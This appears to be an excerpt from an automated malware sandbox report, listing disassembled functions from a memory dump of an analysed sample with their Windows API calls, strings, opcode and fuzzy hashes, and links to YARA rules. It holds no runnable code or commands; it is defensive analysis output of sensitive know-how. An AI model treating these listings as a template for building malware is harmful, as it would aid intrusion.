                                                                                                                                            • Instruction ID: 8c2cb1e407bcceb84ed4806e5830505ca5ee8cb0c7e9729b093c9886a4af833b
                                                                                                                                            • Opcode Fuzzy Hash: 702c96e9c5206198a706ee0e9cd341176f09ce957ef8bd45b626cced7106a3ce
                                                                                                                                            • Instruction Fuzzy Hash: FA71D5716100089FEB18DF28CD85BAE7B66EF81304F54427EF805A72D6D73DDA908B99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041D80C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,0042A578), ref: 0041D876
                                                                                                                                            • _free.LIBCMT ref: 0041D864
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041DA30
                                                                                                                                            Strings
                                                                                                                                            • W. Europe Daylight Time, xrefs: 0041D914
                                                                                                                                            • W. Europe Standard Time, xrefs: 0041D8E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                            • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                            • API String ID: 2155170405-986674615
                                                                                                                                            • Opcode ID: bb60a02eea3537b26924ce13d6dae767d8bca861c706ac0be274237338cfa6d8
                                                                                                                                            • Instruction ID: 040ce8c686c75568376863a9809982f8b495f893015502614a6789f1706dce94
                                                                                                                                            • Opcode Fuzzy Hash: bb60a02eea3537b26924ce13d6dae767d8bca861c706ac0be274237338cfa6d8
                                                                                                                                            • Instruction Fuzzy Hash: B251D8F1E00219ABCB20EF76DD819EA77BCAF45314B50017BE42497291E7389EC6CB58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00411803, Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00411735), ref: 00411825
                                                                                                                                            • GetFileInformationByHandle.KERNELBASE(?,?), ref: 0041187F
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00411735,?,000000FF,00000000,00000000), ref: 0041190D
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00411914
                                                                                                                                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00411951
                                                                                                                                              • Part of subcall function 00411B79: __dosmaperr.LIBCMT ref: 00411BAE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1206951868-0
                                                                                                                                            • Opcode ID: 00472e01cf4d87411616069f0d7d434b85cd1c88de39d2c6aac5915a82620d42
                                                                                                                                            • Instruction ID: d274835a22ada6365d67a3fd31ba40142e4e5efe742fd0fdd0ace425437cd848
                                                                                                                                            • Opcode Fuzzy Hash: 00472e01cf4d87411616069f0d7d434b85cd1c88de39d2c6aac5915a82620d42
                                                                                                                                            • Instruction Fuzzy Hash: 0A416FB5910208AFCB24DFA5DC559EFBBF9EF88300700442EF956D3220E6349985CB24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00408629, Relevance: 6.5, APIs: 2, Strings: 1, Instructions: 1216sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 00408763
                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 0040944F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateDirectorySleep
                                                                                                                                            • String ID: 152138533219
                                                                                                                                            • API String ID: 3988616660-2264522534
                                                                                                                                            • Opcode ID: 97c4bc7524fddd7a1b320b33b7cc95c8679300a15b802be2b35c23c69fe8a461
                                                                                                                                            • Instruction ID: 78297d644fef08c92a0f5307ffaf98be58608cc5950f95d6760c18d9f0eddcdb
                                                                                                                                            • Opcode Fuzzy Hash: 97c4bc7524fddd7a1b320b33b7cc95c8679300a15b802be2b35c23c69fe8a461
                                                                                                                                            • Instruction Fuzzy Hash: 81923671A001049BEB08DF38CD8579DBB32AB42314F50867EE499B72D6DB3D99C58B98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00406E83, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00406E95
                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 00406EA7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesCreateDirectoryFile
                                                                                                                                            • String ID: RQ-}
                                                                                                                                            • API String ID: 3401506121-3262761053
                                                                                                                                            • Opcode ID: bfa460709b5004f69abd56d0ea8684a20f1918d5594968668a547dc7b232ac75
                                                                                                                                            • Instruction ID: 19fdfd9d68963fd5cd20397d210cd5fa53fbcab5af73ce7d1a805281eea9e77f
                                                                                                                                            • Opcode Fuzzy Hash: bfa460709b5004f69abd56d0ea8684a20f1918d5594968668a547dc7b232ac75
                                                                                                                                            • Instruction Fuzzy Hash: A0518871A001089BEB08EB78DD86B9D7B26DF45314F64063AF805B73C2D63DE9918B99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00406AA0, Relevance: 4.7, APIs: 3, Instructions: 198COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTemp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2920410445-0
                                                                                                                                            • Opcode ID: 597d4eeed29c607724761ed191113478a0f44768ff21288523a7a8b54482b79c
                                                                                                                                            • Instruction ID: 11c41e0c62b493da908bae2c5f8d30217ed4bb9da9ed4355a594f427151aa790
                                                                                                                                            • Opcode Fuzzy Hash: 597d4eeed29c607724761ed191113478a0f44768ff21288523a7a8b54482b79c
                                                                                                                                            • Instruction Fuzzy Hash: 1F712370E00208CBEF04DFA8D985BDEBB75EF41308F60056AE415772C2D779A99ACB95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004140D6, Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            • Opcode ID: 6423d12e304794852184283653ce998c4083254e30a2d3a48aea29f2464e05c9
                                                                                                                                            • Instruction ID: db115dec7874d442dc70fa13932feb2baf758ebf54dfa818336f0a8e6411352a
                                                                                                                                            • Opcode Fuzzy Hash: 6423d12e304794852184283653ce998c4083254e30a2d3a48aea29f2464e05c9
                                                                                                                                            • Instruction Fuzzy Hash: 2C21C0366082107BEB149E75AC4A7FB7BA9CFC5324F24015FE9449B342D93A8DC38368
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041D967, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0041D9DA
                                                                                                                                            • _free.LIBCMT ref: 0041DA30
                                                                                                                                              • Part of subcall function 0041D80C: _free.LIBCMT ref: 0041D864
                                                                                                                                              • Part of subcall function 0041D80C: GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,0042A578), ref: 0041D876
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 597776487-0
                                                                                                                                            • Opcode ID: 32a7c312c9e11bdade10c5322069f8c007b3c6881b3c5d26d8d0bbe9204682d5
                                                                                                                                            • Instruction ID: b4438ebd27e0fe3b3ba78e4ac26532b1b5adf5f6eec5d9cf787ac4f8c1669f87
                                                                                                                                            • Opcode Fuzzy Hash: 32a7c312c9e11bdade10c5322069f8c007b3c6881b3c5d26d8d0bbe9204682d5
                                                                                                                                            • Instruction Fuzzy Hash: 33213BF2E0422597CB30E7269C81EEB77788FC0364F10026BE499A2181DA7C4DC6C59D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00415614, Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00403AF0,?,00415542,00403AF0,0042CFD8,0000000C,004155F4,0042CEB8), ref: 0041566A
                                                                                                                                            • GetLastError.KERNEL32(?,00415542,00403AF0,0042CFD8,0000000C,004155F4,0042CEB8), ref: 00415674
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041569F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 490808831-0
                                                                                                                                            • Opcode ID: 807730107f36a853c18b8d279feb0625d776876c165a816df0ebc4419417172f
                                                                                                                                            • Instruction ID: 855a1b191d83c3e9394ad136f7d9456ed2f12c59f6f5d489b6f4b645ce6e1dde
                                                                                                                                            • Opcode Fuzzy Hash: 807730107f36a853c18b8d279feb0625d776876c165a816df0ebc4419417172f
                                                                                                                                            • Instruction Fuzzy Hash: 6B01E53270065096D6201235E845BFF77494BC2738FAA026FF81D872C2DAA8CCD1959C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041CA29, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: ^SA
                                                                                                                                            • API String ID: 269201875-154051897
                                                                                                                                            • Opcode ID: f0494b7c96f61bce48558fe6fa7ea348df39f2d3ae51a74188536c639171ff39
                                                                                                                                            • Instruction ID: 6034d8ea27f616415ff3ffdc71913a6cbd744896c4c1229f28ba72df701dd8a7
                                                                                                                                            • Opcode Fuzzy Hash: f0494b7c96f61bce48558fe6fa7ea348df39f2d3ae51a74188536c639171ff39
                                                                                                                                            • Instruction Fuzzy Hash: 50014472C0015DBFCF02EFE99C01AEE7FB5AF08354F144166F914E2161E6358AA1DB95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00404B45, Relevance: 3.3, APIs: 2, Instructions: 281COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 00404B4E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 3f582ad880e6659179c02ad44dfcbce4418b16084d5662d64692669e9f286d66
                                                                                                                                            • Instruction ID: 6d6f9a4f55fa62413262049a94d9db99ee72b16365296f345659306d095720f9
                                                                                                                                            • Opcode Fuzzy Hash: 3f582ad880e6659179c02ad44dfcbce4418b16084d5662d64692669e9f286d66
                                                                                                                                            • Instruction Fuzzy Hash: 25813771A101089BEB08EB79CD85B9E7666EF81304F50463EF505A72D2D77DEAC0CB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00404C72, Relevance: 3.3, APIs: 2, Instructions: 279COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 00404C75
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: bc714b3f61716c0945cf551f9801eb4af206184e04a05544e9a5ffc87449804e
                                                                                                                                            • Instruction ID: 38ec967fc6cca89652e96f46a14f93b666f82d7160196d8141908d1a3359c393
                                                                                                                                            • Opcode Fuzzy Hash: bc714b3f61716c0945cf551f9801eb4af206184e04a05544e9a5ffc87449804e
                                                                                                                                            • Instruction Fuzzy Hash: 5B815771A101049BEB08EB79DD89B9E7666EF81304F50463EF504AB2D2D73DDAC0CB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00404FE7, Relevance: 3.3, APIs: 2, Instructions: 276COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 00404FEA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 0e0e0b4c0a47be0307a24992ca4d54e19ee6082eb332cc1a519041784d3ebbab
                                                                                                                                            • Instruction ID: 1b496a8202566a01a187d0a2371c9978a2df59dcd6f2c8dad7bd9fd1590a30e3
                                                                                                                                            • Opcode Fuzzy Hash: 0e0e0b4c0a47be0307a24992ca4d54e19ee6082eb332cc1a519041784d3ebbab
                                                                                                                                            • Instruction Fuzzy Hash: 83814571A101049BEB08DB79CD85BAE7666EF41308F50463EF404AB2D2D77DDA80CF98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040510E, Relevance: 3.3, APIs: 2, Instructions: 275COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 00405111
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 371c83456d325b8a6bc04af3ce419bcf4ad4e91acc5b2cda2fa648ebae7eb5c1
                                                                                                                                            • Instruction ID: b8c174c393774d19d91c100d689e0051ae8876b72677ef2ad20fd36fdb314877
                                                                                                                                            • Opcode Fuzzy Hash: 371c83456d325b8a6bc04af3ce419bcf4ad4e91acc5b2cda2fa648ebae7eb5c1
                                                                                                                                            • Instruction Fuzzy Hash: 67813671A10104ABEB18DB79CD85B9E7666EF41304F50463EF404AB2D6D77DDA80CF98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004049F0, Relevance: 3.1, APIs: 2, Instructions: 96synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00404A51
                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00404A57
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1925916568-0
                                                                                                                                            • Opcode ID: 4764a7def86980c548cd1876a4be775a90f8cf0cba85ad47475a1515680e16d9
                                                                                                                                            • Instruction ID: 1538a0d28656e8d0e6124bc93c7601387912aaaea671caeeb26196c8b1ff13f5
                                                                                                                                            • Opcode Fuzzy Hash: 4764a7def86980c548cd1876a4be775a90f8cf0cba85ad47475a1515680e16d9
                                                                                                                                            • Instruction Fuzzy Hash: 2B31BF71B000089BCB08CBA9C884BAEB7B1EF85301F60457AE215F7291D73CAA858F5C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041169B, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c736529f7acadb353fb6955928a0462f49582df703462f5d78acc0b9830c68be
                                                                                                                                            • Instruction ID: 1b325ae266a3c71b958860948b0449c9aab02b887ff45276bb3470641ebfa106
                                                                                                                                            • Opcode Fuzzy Hash: c736529f7acadb353fb6955928a0462f49582df703462f5d78acc0b9830c68be
                                                                                                                                            • Instruction Fuzzy Hash: D12138318011086AEB107B659C46BDF3B28DF41379F110326FA346B2E1C7B85E46C669
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00411973, Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,004118AA,?,?,00000000,00000000), ref: 004119A1
                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,004118AA,?,?,00000000,00000000), ref: 004119B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                            • Opcode ID: c1a149f45ae8c2ac54a4059c04449602768ca31302f9271c72a05983b67d9f87
                                                                                                                                            • Instruction ID: db796711c81c52c4d736926c88087c1d3fe2b9ff757cefbee4cb614f81386a0d
                                                                                                                                            • Opcode Fuzzy Hash: c1a149f45ae8c2ac54a4059c04449602768ca31302f9271c72a05983b67d9f87
                                                                                                                                            • Instruction Fuzzy Hash: E5111FB2A1010DABCB10DFD5C895EDF77BCAB08310F504667E616E6190EB34EA45CB65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040705D, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 53sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00407096
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: RQ-}
                                                                                                                                            • API String ID: 3472027048-3262761053
                                                                                                                                            • Opcode ID: 457ddfa09d0bd9e7a1c4618ed3a296a402955018bac36a49cb6da363f9bd3119
                                                                                                                                            • Instruction ID: cd3153beea85d7c71e009b5d71d96ff78024b1bb33d521e86780237f9deaf5ca
                                                                                                                                            • Opcode Fuzzy Hash: 457ddfa09d0bd9e7a1c4618ed3a296a402955018bac36a49cb6da363f9bd3119
                                                                                                                                            • Instruction Fuzzy Hash: 40014971A1004407EB08DB38CD8575E76128BC1358F10863AF848AF3C6C53DE9D0468A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00414083, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            • Opcode ID: c993eeedc7c449f13ee9264ab6127133e9661d5c50bfb7284b723448b80e7b6d
                                                                                                                                            • Instruction ID: 3d095d306168320866402369d403beb1669284c2e7999e5a8039d735650467a3
                                                                                                                                            • Opcode Fuzzy Hash: c993eeedc7c449f13ee9264ab6127133e9661d5c50bfb7284b723448b80e7b6d
                                                                                                                                            • Instruction Fuzzy Hash: EFE0A032602920819231A63B7C013EA09A5ABC933AB11037BE628861E1DF7848C7445E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02220DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02220223,?,?), ref: 02220E02
                                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02220223,?,?), ref: 02220E07
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                            • Instruction ID: c91d1f96f083f815efec21b016bd37ce016262ffb7b4bea4924aced3a483753c
                                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                            • Instruction Fuzzy Hash: 25D0123115512C77D7002AD4DC09BCDBB1C9F05B66F008011FB0DD9181C7719E4046E5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00408630, Relevance: 2.5, APIs: 1, Instructions: 980sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 00408763
                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 0040944F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateDirectorySleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3988616660-0
                                                                                                                                            • Opcode ID: 72e6a1ff520da0eb37850ac480373af8367d91ec8b7e4ec26cfd180d106201ca
                                                                                                                                            • Instruction ID: b59bf4c397ed125275f01cb8d269716e917902c23e65d060e901476d32ddac75
                                                                                                                                            • Opcode Fuzzy Hash: 72e6a1ff520da0eb37850ac480373af8367d91ec8b7e4ec26cfd180d106201ca
                                                                                                                                            • Instruction Fuzzy Hash: 61722771A001049BEB18DF38CD8479DBB32AB81314F50867EE499B72D6DB3D9DC58B98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040DCC0, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0040DD74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 118556049-0
                                                                                                                                            • Opcode ID: 6318f92908e7268408159fd68953654b1d7210771cc0579528f60525c4d23caf
                                                                                                                                            • Instruction ID: cf6848d64acddcf31b58c8451df0c52e6b929758e4bb2f0896ae904a304ce8b7
                                                                                                                                            • Opcode Fuzzy Hash: 6318f92908e7268408159fd68953654b1d7210771cc0579528f60525c4d23caf
                                                                                                                                            • Instruction Fuzzy Hash: 6C21C2B1A003009FD724DF68D940A56B7F8EF54354B100A3FE54AD7381E7B5EA98C7A5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041531F, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                            • Opcode ID: 5b9b3ff5b06060b83a180fecabe560582c40c302df106cdafeb20deb20b3fa96
                                                                                                                                            • Instruction ID: 1d6aca65bcf3e25318dfe7d7095636701c7e0c87e9e1967b12b01852e40d3c12
                                                                                                                                            • Opcode Fuzzy Hash: 5b9b3ff5b06060b83a180fecabe560582c40c302df106cdafeb20deb20b3fa96
                                                                                                                                            • Instruction Fuzzy Hash: 5F111871A0420AAFCB05DF58E941ADB7BF5EF48304F05406AF809EB351D671D911CB68
